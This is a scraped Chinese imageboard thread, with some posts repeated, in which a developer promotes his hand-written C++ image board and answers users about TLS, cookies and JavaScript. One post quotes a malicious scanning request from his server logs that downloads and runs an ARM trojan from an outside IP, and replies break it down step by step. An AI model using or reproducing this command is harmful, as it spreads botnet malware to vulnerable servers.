[綜合]無題 無名 ID:BSheOpvE 2022/07/16(六) 20:03:31.389 No.28304304
評分:0, 年:0, 月:0, 週:0, 日:0, [+1 / -1] 最後更新:2022-07-17 05:55:06
我C++新K島島民啦
島喜偶爾會隨機當掉的狗屎爛島?
島民平常點開縮圖都是左鍵開在原分頁裡、還是中鍵另開分頁?
我自己都是另開分頁
畢竟不是每個板都有開在原分頁的功能 (如:雙葉),就習慣了最通用的那套
結果做出來一堆人說要原分頁點開
害我緊急趕工
還做出了一套會把所有原圖都載入的失敗版本,又緊急做了一版對的上去
感謝昨天島民的熱心參與
這一天來修了很多bug,進度遠超自己預期
果然有人在後面鞭策時工作效率會變高
上傳62MB的圖應該不會再把伺服器搞壞了 (但還是會上傳失敗,上限10MB)
雖然偶爾還是會隨機當掉,那個大概不好修
掛上了限制級的警告頁
這樣上車應該就不會被警察找麻煩了...吧?
https://fecha.tw/nameless/
島喜偶爾會隨機當掉的狗屎爛島?
島民平常點開縮圖都是左鍵開在原分頁裡、還是中鍵另開分頁?
我自己都是另開分頁
畢竟不是每個板都有開在原分頁的功能 (如:雙葉),就習慣了最通用的那套
結果做出來一堆人說要原分頁點開
害我緊急趕工
還做出了一套會把所有原圖都載入的失敗版本,又緊急做了一版對的上去
感謝昨天島民的熱心參與
這一天來修了很多bug,進度遠超自己預期
果然有人在後面鞭策時工作效率會變高
上傳62MB的圖應該不會再把伺服器搞壞了 (但還是會上傳失敗,上限10MB)
雖然偶爾還是會隨機當掉,那個大概不好修
掛上了限制級的警告頁
這樣上車應該就不會被警察找麻煩了...吧?
https://fecha.tw/nameless/
>>28304304
換個底色之類的 在印象上做出區別
換個底色之類的 在印象上做出區別
有想好怎麼招人上去了嗎
畢竟你的對手是K島
畢竟你的對手是K島
無題 無名 ID:m.Mh9z6k 2022/07/16(六) 20:11:48.119 No.28304455
>>28304304
...
...
剛剛發文發現神秘怪客的網址被超連結了
避免島民誤點還是砍掉重發吧
技術島民滿多的
來聊點技術上的趣聞
內行島民大概都知道
有些機掰人會拿常見的漏洞在網路上隨機亂戳,戳到賺到
我的log裡撈出了這麼一句神祕的request
GET /shell?cd+/tmp;+wget+h t t p : / / 7 4 .201.28.102/idk/h o m e.arm;+chmod+777+home.arm;+./home.arm Jaws.Selfrep;rm+-rf+home.arm HTTP/1.1
雖然我的程式根本不支援這種script所以中招率零
但看到這些關鍵字出現還是會讓人膽戰心驚
那個IP我查過應該是隨機亂戳的,不是島民,所以就不幫他遮了
>>28304357
我完全不懂設計啊...
我就是除了C++什麼都不會
其實前端我本來也不會的,為了寫這東西才從零開始學
>>28304374
沒有
目前也還沒到招人階段,先把功能完善、系統穩定了再說
現在天天發串其實只是在跟島民培養感情
避免島民誤點還是砍掉重發吧
技術島民滿多的
來聊點技術上的趣聞
內行島民大概都知道
有些機掰人會拿常見的漏洞在網路上隨機亂戳,戳到賺到
我的log裡撈出了這麼一句神祕的request
GET /shell?cd+/tmp;+wget+h t t p : / / 7 4 .201.28.102/idk/h o m e.arm;+chmod+777+home.arm;+./home.arm Jaws.Selfrep;rm+-rf+home.arm HTTP/1.1
雖然我的程式根本不支援這種script所以中招率零
但看到這些關鍵字出現還是會讓人膽戰心驚
那個IP我查過應該是隨機亂戳的,不是島民,所以就不幫他遮了
>>28304357
我完全不懂設計啊...
我就是除了C++什麼都不會
其實前端我本來也不會的,為了寫這東西才從零開始學
>>28304374
沒有
目前也還沒到招人階段,先把功能完善、系統穩定了再說
現在天天發串其實只是在跟島民培養感情
你的爛島我手機進進不去
用chrome跟samsung瀏覽器都進不去
出現說不支援這個通訊協定
用chrome跟samsung瀏覽器都進不去
出現說不支援這個通訊協定
>>28304404
我有在記錄島民有哪些建議
有空就會一個個做起來
未來打算在新島上做投票系統
現在還沒
>>28304538
我只支援TLS1.3
瀏覽器太舊可能進不去
你可以把https改成http應該就可以了
我有在記錄島民有哪些建議
有空就會一個個做起來
未來打算在新島上做投票系統
現在還沒
>>28304538
我只支援TLS1.3
瀏覽器太舊可能進不去
你可以把https改成http應該就可以了
>>28304584
/shell?
命令列
cd /tmp;
到某資料夾
wget+h t t p : / / 7 4 .201.28.102/idk/h o m e.arm;
網路下載木馬
chmod+777 home.arm;
修改執行權限
./home.arm Jaws.Selfrep;
執行木馬
rm -rf+home.arm HTTP/1.1
刪掉木馬
/shell?
命令列
cd /tmp;
到某資料夾
wget+h t t p : / / 7 4 .201.28.102/idk/h o m e.arm;
網路下載木馬
chmod+777 home.arm;
修改執行權限
./home.arm Jaws.Selfrep;
執行木馬
rm -rf+home.arm HTTP/1.1
刪掉木馬
>>28304584
>/shell
尋找名為shell的網頁
這應該是某個廣為使用的伺服器軟體的內鍵特殊網頁
這個名字暗示著他可以直接對那台電腦核心下指令
>?
餵給shell後面這串東西當參數
>wget http~~home.arm
到指定伺服器下載這檔案
看起來是執行檔
>>chmod 777 home.arm
告訴作業系統這東西可以執行
>>./home.arm
執行他
裡面塞了什麼恐怖的程式碼沒人知道
>/shell
尋找名為shell的網頁
這應該是某個廣為使用的伺服器軟體的內鍵特殊網頁
這個名字暗示著他可以直接對那台電腦核心下指令
>?
餵給shell後面這串東西當參數
>wget http~~home.arm
到指定伺服器下載這檔案
看起來是執行檔
>>chmod 777 home.arm
告訴作業系統這東西可以執行
>>./home.arm
執行他
裡面塞了什麼恐怖的程式碼沒人知道
無題 無名 ID:IHtOshb2 2022/07/16(六) 20:25:19.665 No.28304683
あぼーん あぼーん ID:ehlI25wY 2022/07/16(六) 20:25:36.723 No.28304691
這篇回覆已被刪除
無題 無名 ID:D4M/PaN2 2022/07/16(六) 20:26:01.113 No.28304695
Domain Name: fecha.tw
Domain Status: clientTransferProhibited
Registrant:
Domain Protection Services, Inc.
Whois Agent fecha.tw@protecteddomainservices.com
+1.7208009072
+1.7209758725
PO Box 1769
Denver, CO
US
Administrative Contact:
Whois Agent fecha.tw@protecteddomainservices.com
+1.7208009072
+1.7209758725
Technical Contact:
Whois Agent fecha.tw@protecteddomainservices.com
+1.7208009072
+1.7209758725
Record expires on 2023-06-04 23:40:37 (UTC+8)
Record created on 2022-06-04 23:40:37 (UTC+8)
Domain servers in listed order:
ns1cwy.name.com
ns2knz.name.com
ns3qtx.name.com
ns4hmp.name.com
Registration Service Provider: Name.com
Registration Service URL: http://www.name.com/
Provided by Registry Services, LLC. Registry Gateway Services
Domain Status: clientTransferProhibited
Registrant:
Domain Protection Services, Inc.
Whois Agent fecha.tw@protecteddomainservices.com
+1.7208009072
+1.7209758725
PO Box 1769
Denver, CO
US
Administrative Contact:
Whois Agent fecha.tw@protecteddomainservices.com
+1.7208009072
+1.7209758725
Technical Contact:
Whois Agent fecha.tw@protecteddomainservices.com
+1.7208009072
+1.7209758725
Record expires on 2023-06-04 23:40:37 (UTC+8)
Record created on 2022-06-04 23:40:37 (UTC+8)
Domain servers in listed order:
ns1cwy.name.com
ns2knz.name.com
ns3qtx.name.com
ns4hmp.name.com
Registration Service Provider: Name.com
Registration Service URL: http://www.name.com/
Provided by Registry Services, LLC. Registry Gateway Services
無題 無名 ID:FT98GnV. 2022/07/16(六) 20:26:31.937 No.28304706
無題 無名 ID:79YDZ3kM 2022/07/16(六) 20:29:34.717 No.28304752
無題 無名 ID:BSheOpvE 2022/07/16(六) 20:30:22.189 No.28304761
>>28304729
貪求方便的時候
資安漏洞往往都是這麼出來的
不可否認
你有一個公開的http request可以執行任意shell是個很方便的工具
直接把所有能send http request的東西都變成ssh
可是當有別人發現你這後門開著的時候就...
貪求方便的時候
資安漏洞往往都是這麼出來的
不可否認
你有一個公開的http request可以執行任意shell是個很方便的工具
直接把所有能send http request的東西都變成ssh
可是當有別人發現你這後門開著的時候就...
去掉https後我目前只有samsung瀏覽器能上喔
chrome還是不能用
還有你只有放首頁18禁啊
點進去又回到首頁了
chrome還是不能用
還有你只有放首頁18禁啊
點進去又回到首頁了
web server引擎是自己用c++刻的嗎 真厲害啊
>>28304783
要明確寫http,整段砍掉他可能跳回https
>>還有你只有放首頁18禁啊
>>點進去又回到首頁了
你點開會跳回警告頁嗎?
那個功能是看cookie的,你如果不給我餵cookie的話就會卡在門前進不了站
>>28304792
是
艱困但沒多少生產性的精障行為
大概跟沒事去爬聖母峰整死自己差不多
要明確寫http,整段砍掉他可能跳回https
>>還有你只有放首頁18禁啊
>>點進去又回到首頁了
你點開會跳回警告頁嗎?
那個功能是看cookie的,你如果不給我餵cookie的話就會卡在門前進不了站
>>28304792
是
艱困但沒多少生產性的精障行為
大概跟沒事去爬聖母峰整死自己差不多
web後端用C++?
>>28304952
不然就走原本pixmicat這種伺服器端渲染的做法 我比較老派
之後有想好怎麼管理嗎? 會開設板塊進行回報嗎?
另外我希望不要像是09那樣有什麼新功能都直接上 而不做任何提醒告知的...
不然就走原本pixmicat這種伺服器端渲染的做法 我比較老派
之後有想好怎麼管理嗎? 會開設板塊進行回報嗎?
另外我希望不要像是09那樣有什麼新功能都直接上 而不做任何提醒告知的...
>>28304952
如果開發load太多 有考慮招人開發嗎
如果開發load太多 有考慮招人開發嗎
>>28305000
全部都後端生成
user每點一個按鍵就會換頁一次
不是不行
但除了單純查詢用途以外的網站(例如圖書館查書網頁),使用者體驗跟效能都會很差
那套20年前的老派作法請丟了
現在是2022年,前端早就上太空了
請跟上
全部都後端生成
user每點一個按鍵就會換頁一次
不是不行
但除了單純查詢用途以外的網站(例如圖書館查書網頁),使用者體驗跟效能都會很差
那套20年前的老派作法請丟了
現在是2022年,前端早就上太空了
請跟上
>>28304991
對
我就精障
>>28305000
>>管理
del
這網站的一切都是我親手做的,點下去絕對不會像K島一樣石沉大海
>>另外我希望不要像是09那樣有什麼新功能都直接上 而不做任何提醒告知的...
初期更新頻繁沒辦法一一告知,而且有些根本是修bug不用問
以後有大更新的話會盡量詢問使用者意見
>>28305025
沒有
我的code在設計時就沒有考慮過跟別人協作的相容性
>>28305006
cookie跟JS都是功能強大但常被用在惡質用途的東西
例如追蹤你的瀏覽紀錄 (藉此塞給你更有效的廣告)
就讓某些比較精神潔癖的人討厭他們
既然我身為使用者的時候討厭網站亂塞我JS
那我當提供者時當然也要做個符合我自己標準、不亂塞JS的網站
對
我就精障
>>28305000
>>管理
del
這網站的一切都是我親手做的,點下去絕對不會像K島一樣石沉大海
>>另外我希望不要像是09那樣有什麼新功能都直接上 而不做任何提醒告知的...
初期更新頻繁沒辦法一一告知,而且有些根本是修bug不用問
以後有大更新的話會盡量詢問使用者意見
>>28305025
沒有
我的code在設計時就沒有考慮過跟別人協作的相容性
>>28305006
cookie跟JS都是功能強大但常被用在惡質用途的東西
例如追蹤你的瀏覽紀錄 (藉此塞給你更有效的廣告)
就讓某些比較精神潔癖的人討厭他們
既然我身為使用者的時候討厭網站亂塞我JS
那我當提供者時當然也要做個符合我自己標準、不亂塞JS的網站
底色能不能改個深色系的
用習慣夜間模式了
現在看到亮色系網站都覺得很刺眼
用習慣夜間模式了
現在看到亮色系網站都覺得很刺眼
無題 無名 ID:VgKRjjb. 2022/07/16(六) 20:56:06.067 No.28305124
>>28305078
不然寫一個api查詢 不需要伺服器渲染全部頁面?
不然寫一個api查詢 不需要伺服器渲染全部頁面?
要怎麼盈利? 不用cookies鎖定user群去針對性投放ads
你自己一個人的荷包和熱情能讓你的島run多久
你自己一個人的荷包和熱情能讓你的島run多久
無題 無名 ID:mK0xfiII 2022/07/16(六) 20:56:23.936 No.28305134
無題 無名 ID:.e27GfB6 2022/07/16(六) 20:56:24.483 No.28305135
>>28305106
我研究一下怎麼切換
能切換了就做深色版
>>28305130
至少一兩年吧
因為已經是沉沒成本了
>>28305143
只靠伺服器記錄的話你只要換IP伺服器就不知道你是誰了
但有了JS或cookie,就可以叫你自己把名牌掛上
你的瀏覽器以為執行JS是在增進使用者瀏覽
實際上是在洩漏使用者行蹤
根本搞錯效忠對象
所以才有人認為這些東西很邪惡
我研究一下怎麼切換
能切換了就做深色版
>>28305130
至少一兩年吧
因為已經是沉沒成本了
>>28305143
只靠伺服器記錄的話你只要換IP伺服器就不知道你是誰了
但有了JS或cookie,就可以叫你自己把名牌掛上
你的瀏覽器以為執行JS是在增進使用者瀏覽
實際上是在洩漏使用者行蹤
根本搞錯效忠對象
所以才有人認為這些東西很邪惡
無題 無名 ID:BSheOpvE 2022/07/16(六) 21:13:06.831 No.28305410
>>28305348
上面說的是JS廣泛不討喜
如果縮小範圍問我自己不喜歡前端渲染的原因的話
最主要是前端渲染出來的網頁常常會跟低階操作不相容 (只考慮左鍵的行為卻不考慮反白等等)
作為一個使用者用起來就是卡手卡腳
其次是
啊我就不懂JS
用C++寫後端渲染對我來說輕鬆多了
上面說的是JS廣泛不討喜
如果縮小範圍問我自己不喜歡前端渲染的原因的話
最主要是前端渲染出來的網頁常常會跟低階操作不相容 (只考慮左鍵的行為卻不考慮反白等等)
作為一個使用者用起來就是卡手卡腳
其次是
啊我就不懂JS
用C++寫後端渲染對我來說輕鬆多了
無題 無名 ID:LnHDH.Sg 2022/07/16(六) 21:13:24.980 No.28305415
>>28305093
> cookie跟JS都是功能強大但常被用在惡質用途的東西
> 例如追蹤你的瀏覽紀錄 (藉此塞給你更有效的廣告)
> 就讓某些比較精神潔癖的人討厭他們
> 既然我身為使用者的時候討厭網站亂塞我JS
> 那我當提供者時當然也要做個符合我自己標準、不亂塞JS的網站
我真的覺得用C++沒有任何問題,把cookie、JS跟惡意畫上等號比較精障
何況綜合就在用一堆js做動態內容
> cookie跟JS都是功能強大但常被用在惡質用途的東西
> 例如追蹤你的瀏覽紀錄 (藉此塞給你更有效的廣告)
> 就讓某些比較精神潔癖的人討厭他們
> 既然我身為使用者的時候討厭網站亂塞我JS
> 那我當提供者時當然也要做個符合我自己標準、不亂塞JS的網站
我真的覺得用C++沒有任何問題,把cookie、JS跟惡意畫上等號比較精障
何況綜合就在用一堆js做動態內容
無題 無名 ID:D4M/PaN2 2022/07/16(六) 21:14:54.825 No.28305452
>>28305230
伺服器記錄也可以靠user agent追蹤
要是user agent太獨特 還是會知道
當然有用js更能識別出來
https://www.amiunique.org/
JS或cookie使用隱私視窗和ad blocker多少能防一點
最後js是你寫的
你可以決定要不要追蹤啊
伺服器記錄也可以靠user agent追蹤
要是user agent太獨特 還是會知道
當然有用js更能識別出來
https://www.amiunique.org/
JS或cookie使用隱私視窗和ad blocker多少能防一點
最後js是你寫的
你可以決定要不要追蹤啊
聽起來你是要做一個比現在K島甚至PTT還破爛的網站
唯一優點是你當管理員
唯一優點是你當管理員
無題 無名 ID:HK0Rnohk 2022/07/16(六) 21:22:22.317 No.28305549
意外的有模有樣
對你改觀了
海鰻厲害的嘛
對你改觀了
海鰻厲害的嘛
無題 無名 ID:BSheOpvE 2022/07/16(六) 21:27:21.731 No.28305627
隨機當機的問題有點嚴重,應該優先修正
可是log完全沒有抓到疑點...
可是log完全沒有抓到疑點...
無題 無名 ID:BSheOpvE 2022/07/16(六) 21:33:55.696 No.28305757
以後有打算支援webm甚至webp嗎
無題 無名 ID:BSheOpvE 2022/07/16(六) 23:22:59.704 No.28307806
>>28306786
短期間內不會有
短期間內不會有